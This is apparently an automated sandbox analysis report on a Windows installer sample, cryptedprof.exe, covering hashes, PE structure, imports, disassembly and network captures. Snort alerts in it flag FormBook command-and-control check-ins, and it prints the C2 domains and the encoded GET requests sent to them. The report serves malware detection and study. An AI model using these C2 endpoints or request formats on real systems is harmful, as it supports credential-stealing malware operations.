                                                                                      Entropy (8bit):7.898845441356521
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:gLGYsU41q9M2FboK24/pOrBMy3LgSLnUZnSAUe+aL8yRvJzF3vY/vHSNt:gLGJcBpOVMy3cpZnT+aYuJp3vYnH6t
                                                                                      MD5:392D17F078932F65177A128DC21CCE8C
                                                                                      SHA1:B7FBFEC205559E2698EA814FCC79CBDAC94E61FE
                                                                                      SHA-256:3BCA4926EA2A2FCD3A72893AF270033E9DCB8112B6BF24022FE47A7704E5A8B2
                                                                                      SHA-512:6FC6AB4E4D24D28F96C92B517393404279FFAA9B3B76B93F0BD3A37D27875E6A08F9CAE1AC28313088C041DA7066674FBB6C42D16F000D8B1EB844D7E13BB3BC
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview: |.......,...................#...................|...........................................................................................................................................................................................................................................J...................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      Static File Info

                                                                                      General

                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                      Entropy (8bit):7.1919627087512215
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                      File name:cryptedprof.exe
                                                                                      File size:339210
                                                                                      MD5:72efe20e4a59ae2722383b8786956994
                                                                                      SHA1:453b2af3b318668926087556eebfa93eda75d2df
                                                                                      SHA256:d8e0edf1cca3b6edefcd830e233131c593997b5bd4454891dc1b70614862f718
                                                                                      SHA512:3b4c4106d6576ff14419bc9144473e9cc6ef1177dbcd7d9319559fe05563cdf50e9dc62d179464b07d020e98f92da52435e388d3e0e754ca65b14ac0d4e5320e
                                                                                      SSDEEP:6144:111QBRRiKNkBMH1JtudsBnOVMy3cdZnT8aYuJp3v4qzVpwyeLyA:iRtkBMH1ruds5+r3cdZnYalF44VTG
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG..sw..PG..VA..PG.Rich.PG.........PE..L..._.$_.................f...........4............@

                                                                                      File Icon

                                                                                      Icon Hash:70cc8696868ce031

                                                                                      Static PE Info

                                                                                      General

                                                                                      Entrypoint:0x403486
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                      Time Stamp:0x5F24D75F [Sat Aug 1 02:45:51 2020 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:4
                                                                                      OS Version Minor:0
                                                                                      File Version Major:4
                                                                                      File Version Minor:0
                                                                                      Subsystem Version Major:4
                                                                                      Subsystem Version Minor:0
                                                                                      Import Hash:ea4e67a31ace1a72683a99b80cf37830

                                                                                      Entrypoint Preview

                                                                                      Instruction
                                                                                      sub esp, 00000184h
                                                                                      push ebx
                                                                                      push esi
                                                                                      push edi
                                                                                      xor ebx, ebx
                                                                                      push 00008001h
                                                                                      mov dword ptr [esp+18h], ebx
                                                                                      mov dword ptr [esp+10h], 0040A130h
                                                                                      mov dword ptr [esp+20h], ebx
                                                                                      mov byte ptr [esp+14h], 00000020h
                                                                                      call dword ptr [004080B0h]
                                                                                      call dword ptr [004080C0h]
                                                                                      and eax, BFFFFFFFh
                                                                                      cmp ax, 00000006h
                                                                                      mov dword ptr [0042F44Ch], eax
                                                                                      je 00007F1D44B738D3h
                                                                                      push ebx
                                                                                      call 00007F1D44B76A4Eh
                                                                                      cmp eax, ebx
                                                                                      je 00007F1D44B738C9h
                                                                                      push 00000C00h
                                                                                      call eax
                                                                                      mov esi, 004082A0h
                                                                                      push esi
                                                                                      call 00007F1D44B769CAh
                                                                                      push esi
                                                                                      call dword ptr [004080B8h]
                                                                                      lea esi, dword ptr [esi+eax+01h]
                                                                                      cmp byte ptr [esi], bl
                                                                                      jne 00007F1D44B738ADh
                                                                                      push 0000000Bh
                                                                                      call 00007F1D44B76A22h
                                                                                      push 00000009h
                                                                                      call 00007F1D44B76A1Bh
                                                                                      push 00000007h
                                                                                      mov dword ptr [0042F444h], eax
                                                                                      call 00007F1D44B76A0Fh
                                                                                      cmp eax, ebx
                                                                                      je 00007F1D44B738D1h
                                                                                      push 0000001Eh
                                                                                      call eax
                                                                                      test eax, eax
                                                                                      je 00007F1D44B738C9h
                                                                                      or byte ptr [0042F44Fh], 00000040h
                                                                                      push ebp
                                                                                      call dword ptr [00408038h]
                                                                                      push ebx
                                                                                      call dword ptr [00408288h]
                                                                                      mov dword ptr [0042F518h], eax
                                                                                      push ebx
                                                                                      lea eax, dword ptr [esp+38h]
                                                                                      push 00000160h
                                                                                      push eax
                                                                                      push ebx
                                                                                      push 00429878h
                                                                                      call dword ptr [0040816Ch]
                                                                                      push 0040A1ECh

                                                                                      Rich Headers

                                                                                      Programming Language:
                                                                                      • [EXP] VC++ 6.0 SP5 build 8804

                                                                                      Data Directories

                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x85440xa0.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x380000x19038.rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x80000x29c.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                      Sections

                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                      .text0x10000x65ad0x6600False0.675628063725data6.48593060343IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                      .rdata0x80000x13800x1400False0.4634765625data5.26110074066IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .data0xa0000x255580x600False0.470052083333data4.21916068772IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                      .ndata0x300000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .rsrc0x380000x190380x19200False0.341466495647data4.34524426272IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                      Resources

                                                                                      NameRVASizeTypeLanguageCountry
                                                                                      RT_ICON0x382980x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
                                                                                      RT_ICON0x48ac00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 1073807359, next used block 4294903552
                                                                                      RT_ICON0x4cce80x25a8data
                                                                                      RT_ICON0x4f2900x10a8data
                                                                                      RT_ICON0x503380x468GLS_BINARY_LSB_FIRST
                                                                                      RT_DIALOG0x507a00x100dataEnglishUnited States
                                                                                      RT_DIALOG0x508a00x11cdataEnglishUnited States
                                                                                      RT_DIALOG0x509bc0x60dataEnglishUnited States
                                                                                      RT_GROUP_ICON0x50a1c0x4cdata
                                                                                      RT_VERSION0x50a680x290MS Windows COFF PA-RISC object fileEnglishUnited States
                                                                                      RT_MANIFEST0x50cf80x340XML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                                      Imports

                                                                                      DLLImport
                                                                                      ADVAPI32.dllRegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
                                                                                      SHELL32.dllSHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
                                                                                      ole32.dllIIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
                                                                                      COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                                                      USER32.dllSetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
                                                                                      GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                                                      KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, GetTempFileNameA, RemoveDirectoryA, WriteFile, CreateDirectoryA, GetLastError, CreateProcessA, GlobalLock, GlobalUnlock, CreateThread, lstrcpynA, SetErrorMode, GetDiskFreeSpaceA, lstrlenA, GetCommandLineA, GetVersion, GetWindowsDirectoryA, SetEnvironmentVariableA, GetTempPathA, CopyFileA, GetCurrentProcess, ExitProcess, GetModuleFileNameA, GetFileSize, ReadFile, GetTickCount, Sleep, CreateFileA, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv

                                                                                      Version Infos

                                                                                      DescriptionData
                                                                                      LegalCopyrightCopyright shivering
                                                                                      FileVersion65.93.64.23
                                                                                      CompanyNamedaf
                                                                                      LegalTrademarksmist
                                                                                      Commentscrookback
                                                                                      ProductNamepinewood king bolete
                                                                                      FileDescriptionAbkhazian (Latin script)
                                                                                      Translation0x0409 0x04e4

                                                                                      Possible Origin

                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                      EnglishUnited States

                                                                                      Network Behavior

                                                                                      Snort IDS Alerts

                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                      02/23/21-15:32:01.456680TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974680192.168.2.634.102.136.180
                                                                                      02/23/21-15:32:01.456680TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974680192.168.2.634.102.136.180
                                                                                      02/23/21-15:32:01.456680TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974680192.168.2.634.102.136.180
                                                                                      02/23/21-15:32:01.600872TCP1201ATTACK-RESPONSES 403 Forbidden804974634.102.136.180192.168.2.6
                                                                                      02/23/21-15:32:44.386288TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975380192.168.2.6111.221.46.49
                                                                                      02/23/21-15:32:44.386288TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975380192.168.2.6111.221.46.49
                                                                                      02/23/21-15:32:44.386288TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975380192.168.2.6111.221.46.49

                                                                                      Network Port Distribution

                                                                                      TCP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Feb 23, 2021 15:32:01.415462017 CET4974680192.168.2.634.102.136.180
                                                                                      Feb 23, 2021 15:32:01.456418991 CET804974634.102.136.180192.168.2.6
                                                                                      Feb 23, 2021 15:32:01.456542015 CET4974680192.168.2.634.102.136.180
                                                                                      Feb 23, 2021 15:32:01.456680059 CET4974680192.168.2.634.102.136.180
                                                                                      Feb 23, 2021 15:32:01.501941919 CET804974634.102.136.180192.168.2.6
                                                                                      Feb 23, 2021 15:32:01.600872040 CET804974634.102.136.180192.168.2.6
                                                                                      Feb 23, 2021 15:32:01.600924015 CET804974634.102.136.180192.168.2.6
                                                                                      Feb 23, 2021 15:32:01.601119041 CET4974680192.168.2.634.102.136.180
                                                                                      Feb 23, 2021 15:32:01.601254940 CET4974680192.168.2.634.102.136.180
                                                                                      Feb 23, 2021 15:32:01.642165899 CET804974634.102.136.180192.168.2.6
                                                                                      Feb 23, 2021 15:32:22.010490894 CET4975280192.168.2.6168.206.81.138
                                                                                      Feb 23, 2021 15:32:22.405154943 CET8049752168.206.81.138192.168.2.6
                                                                                      Feb 23, 2021 15:32:22.405332088 CET4975280192.168.2.6168.206.81.138
                                                                                      Feb 23, 2021 15:32:22.405430079 CET4975280192.168.2.6168.206.81.138
                                                                                      Feb 23, 2021 15:32:22.799341917 CET8049752168.206.81.138192.168.2.6
                                                                                      Feb 23, 2021 15:32:22.799669981 CET8049752168.206.81.138192.168.2.6
                                                                                      Feb 23, 2021 15:32:22.799896002 CET4975280192.168.2.6168.206.81.138
                                                                                      Feb 23, 2021 15:32:22.800066948 CET4975280192.168.2.6168.206.81.138
                                                                                      Feb 23, 2021 15:32:23.199253082 CET8049752168.206.81.138192.168.2.6
                                                                                      Feb 23, 2021 15:32:44.193600893 CET4975380192.168.2.6111.221.46.49
                                                                                      Feb 23, 2021 15:32:44.385819912 CET8049753111.221.46.49192.168.2.6
                                                                                      Feb 23, 2021 15:32:44.386015892 CET4975380192.168.2.6111.221.46.49
                                                                                      Feb 23, 2021 15:32:44.386287928 CET4975380192.168.2.6111.221.46.49
                                                                                      Feb 23, 2021 15:32:44.578690052 CET8049753111.221.46.49192.168.2.6
                                                                                      Feb 23, 2021 15:32:44.603816986 CET8049753111.221.46.49192.168.2.6
                                                                                      Feb 23, 2021 15:32:44.603853941 CET8049753111.221.46.49192.168.2.6
                                                                                      Feb 23, 2021 15:32:44.604140043 CET4975380192.168.2.6111.221.46.49
                                                                                      Feb 23, 2021 15:32:44.604228020 CET4975380192.168.2.6111.221.46.49
                                                                                      Feb 23, 2021 15:32:44.800883055 CET8049753111.221.46.49192.168.2.6

                                                                                      UDP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Feb 23, 2021 15:30:40.467911959 CET5451353192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:30:40.518728971 CET53545138.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:30:43.022846937 CET6204453192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:30:43.090131044 CET53620448.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:11.082956076 CET6379153192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:11.134610891 CET53637918.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:11.895347118 CET6426753192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:11.944017887 CET53642678.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:12.847143888 CET4944853192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:12.898746967 CET53494488.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:13.631004095 CET6034253192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:13.684792995 CET53603428.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:14.428874016 CET6134653192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:14.478703022 CET53613468.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:15.570743084 CET5177453192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:15.619601011 CET53517748.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:16.335077047 CET5602353192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:16.394454002 CET53560238.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:16.494822025 CET5838453192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:16.546437025 CET53583848.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:17.261225939 CET6026153192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:17.312848091 CET53602618.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:18.038053989 CET5606153192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:18.086622953 CET53560618.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:19.267477036 CET5833653192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:19.319128990 CET53583368.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:20.657476902 CET5378153192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:20.706202984 CET53537818.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:21.828244925 CET5406453192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:21.879611969 CET53540648.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:26.449898958 CET5281153192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:26.500972033 CET53528118.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:27.526665926 CET5529953192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:27.579718113 CET53552998.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:28.497622013 CET6374553192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:28.548201084 CET53637458.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:29.678368092 CET5005553192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:29.733423948 CET53500558.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:30.844587088 CET6137453192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:30.896049023 CET53613748.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:36.151079893 CET5033953192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:36.217627048 CET53503398.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:37.760253906 CET6330753192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:37.809017897 CET53633078.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:50.291194916 CET4969453192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:50.353537083 CET53496948.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:50.897938967 CET5498253192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:50.957060099 CET53549828.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:51.536858082 CET5001053192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:51.594027996 CET53500108.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:52.113111973 CET6371853192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:52.159181118 CET6211653192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:52.177457094 CET53637188.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:52.217801094 CET53621168.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:52.341439962 CET6381653192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:52.408416033 CET53638168.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:52.680592060 CET5501453192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:52.731338024 CET53550148.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:53.268157959 CET6220853192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:53.330169916 CET53622088.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:53.975930929 CET5757453192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:54.027441025 CET53575748.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:55.391679049 CET5181853192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:55.441854954 CET53518188.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:56.758450031 CET5662853192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:56.818296909 CET53566288.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:31:57.554359913 CET6077853192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:31:57.616803885 CET53607788.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:32:01.334067106 CET5379953192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:32:01.410595894 CET53537998.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:32:20.171560049 CET5468353192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:32:20.223088980 CET53546838.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:32:20.575880051 CET5932953192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:32:20.635864973 CET53593298.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:32:21.268004894 CET6402153192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:32:21.325251102 CET53640218.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:32:21.792572975 CET5612953192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:32:22.009269953 CET53561298.8.8.8192.168.2.6
                                                                                      Feb 23, 2021 15:32:43.900327921 CET5817753192.168.2.68.8.8.8
                                                                                      Feb 23, 2021 15:32:44.192182064 CET53581778.8.8.8192.168.2.6

                                                                                      DNS Queries

                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                      Feb 23, 2021 15:32:01.334067106 CET192.168.2.68.8.8.80xcf60Standard query (0)www.thatlocaljawn.comA (IP address)IN (0x0001)
                                                                                      Feb 23, 2021 15:32:21.792572975 CET192.168.2.68.8.8.80xcc94Standard query (0)www.warungsuntik.comA (IP address)IN (0x0001)
                                                                                      Feb 23, 2021 15:32:43.900327921 CET192.168.2.68.8.8.80x5f23Standard query (0)www.tabandolano.onlineA (IP address)IN (0x0001)

                                                                                      DNS Answers

                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                      Feb 23, 2021 15:32:01.410595894 CET8.8.8.8192.168.2.60xcf60No error (0)www.thatlocaljawn.comthatlocaljawn.comCNAME (Canonical name)IN (0x0001)
                                                                                      Feb 23, 2021 15:32:01.410595894 CET8.8.8.8192.168.2.60xcf60No error (0)thatlocaljawn.com34.102.136.180A (IP address)IN (0x0001)
                                                                                      Feb 23, 2021 15:32:22.009269953 CET8.8.8.8192.168.2.60xcc94No error (0)www.warungsuntik.com168.206.81.138A (IP address)IN (0x0001)
                                                                                      Feb 23, 2021 15:32:44.192182064 CET8.8.8.8192.168.2.60x5f23No error (0)www.tabandolano.onlinetabandolano.onlineCNAME (Canonical name)IN (0x0001)
                                                                                      Feb 23, 2021 15:32:44.192182064 CET8.8.8.8192.168.2.60x5f23No error (0)tabandolano.online111.221.46.49A (IP address)IN (0x0001)

                                                                                      HTTP Request Dependency Graph

                                                                                      • www.thatlocaljawn.com
                                                                                      • www.warungsuntik.com
                                                                                      • www.tabandolano.online

                                                                                      HTTP Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      0192.168.2.64974634.102.136.18080C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Feb 23, 2021 15:32:01.456680059 CET6332OUTGET /rcv/?VRNh=cg6bZkxEcNPMAIRmM8GPonkuA9GKh0BFEGdQJ3UU0rDFwE5vgU0uCiOyxYirtUdr8QJdvBkiGw==&jL08l2=WXL00450GFoHk HTTP/1.1
                                                                                      Host: www.thatlocaljawn.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Feb 23, 2021 15:32:01.600872040 CET6333INHTTP/1.1 403 Forbidden
                                                                                      Server: openresty
                                                                                      Date: Tue, 23 Feb 2021 14:32:01 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 275
                                                                                      ETag: "6031584e-113"
                                                                                      Via: 1.1 google
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      1192.168.2.649752168.206.81.13880C:\Windows\explorer.exe
                                                                                      TimestampkBytes transferredDirectionData
                                                                                      Feb 23, 2021 15:32:22.405430079 CET6365OUTGET /rcv/?VRNh=pIfKS/hEN6BRYAYnpceiijGTuCPe5XtNGOPRhmV5L9BR4RtlzZsfp+6kyczwPilyRouSrFb70A==&jL08l2=WXL00450GFoHk HTTP/1.1
                                                                                      Host: www.warungsuntik.com
                                                                                      Connection: close
                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                      Data Ascii:
                                                                                      Feb 23, 2021 15:32:22.799669981 CET6368INHTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Tue, 23 Feb 2021 14:32:22 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 479
                                                                                      Connection: close
                                                                                      ETag: "601d0d01-1df"
